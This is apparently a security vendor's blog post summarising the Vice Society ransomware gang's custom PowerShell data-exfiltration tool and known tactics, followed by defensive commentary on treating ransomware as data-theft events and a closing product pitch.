Vice Society Ransomware Gang Wields Custom PowerShell Tool for Data Exfiltration

Date:

April 18, 2023

World map

The Vice Society ransomware gang has been observed using Living-off-the-Land (LotL) techniques by way of a custom PowerShell-based tool to automate data exfiltration on targeted networks.

LotL techniques abuse legitimate network tools and binaries to further attack progression while masking the operation as normal network activity to remain undetected.

“The tool also makes use of exclusion criteria to filter out system files, backups, and folders pointing to web browsers as well as security solutions from Symantec, ESET, and Sophos.” The Hacker News reported.

“The discovery of the data exfiltration script illustrates the ongoing threat of double extortion in the ransomware landscape. It also serves as a reminder for organizations to prioritize robust security protections and stay vigilant against evolving threats.”

Vice Society is a RaaS threat group that first emerged in 2021 and has used a variety of ransomware strains including Hello Kitty/Five Hands and Zeppelin before developing a custom ransomware strain. Tactics include attempts to compromise data backup solutions and clearing security logs on compromised systems to evade detection.

Vice Society is a more recent arrival on the ransomware scene and has been scaling their operations significantly, including a disruptive attack on the second largest school district in the US.

Vice Society has advanced evasion capabilities and can disable security tools like Windows Defender and evade sandbox analysis. The group is known to exploit vulnerabilities in public-facing applications and websites, exploits like PrintNightmare, or through compromised RDP credentials. Vice Society is known to use DLL side-loading techniques and abuse tools like Cobalt Strike, Mimikatz, SystemBC and PowerShell.  

Takeaway: The focus around ransomware attacks has always been centered on the delivery of the payload and encryption of data and systems with the occasional data loss. But, since most ransomware attacks today first exfiltration – with some threat actors even like BianLian and Karakurt skipping the encryption stage altogether – we need to start looking at these operations as straight-up data exfiltration attacks with some ransomware thrown in at the end of the attack.

These are multi-staged attacks, where the threat actors are designed to infiltrate as much of the victim network as possible to exfiltrate sensitive data for extortion. In many cases, even if the victim pays a ransom, the attackers may demand an additional payment for the stolen data.  

Remember that delivery of the ransomware payload occurs at the end of the attack sequence, after sensitive data has already bee exfiltrated. Given how much effort goes into persistence, lateral movement, stealth, security evasion, and data exfiltration, we are simply not putting enough emphasis on these earlier stages in today’s ransomware attacks. There are days, weeks or potentially even months of detectable activity on the network prior to the final payload, and a lot of data is leaving the organization over the course of the attack.

‍The defense mindset here needs to shift to the left significantly where we are addressing ransomware attacks first as an effort to prevent the attackers from exfiltrating data. We should really look at these attacks as data exfiltration events with the additional threat that ransomware could be deployed, as opposed to focusing too much on the tail end of the attack when the ransomware is delivered, and the attack is already successful.  

‍Resilience is key in developing a sound security posture, and organizations can limit the impact of a ransomware payload on operations with resilience planning, but once their data is compromised the attack becomes much more difficult to mitigate, as there is no guarantee the threat actors will honor any agreements even if they receive payment.‍

If the attackers have already exfiltrated the organization's most valuable data, then all those recovery efforts largely go out the window because the attack has already been successful.

Halcyon.ai is the industry’s first dedicated, adaptive security platform that combines multiple advanced proprietary prevention engines along with AI models focused specifically on stopping ransomware – talk to a Halcyon expert today to find out more.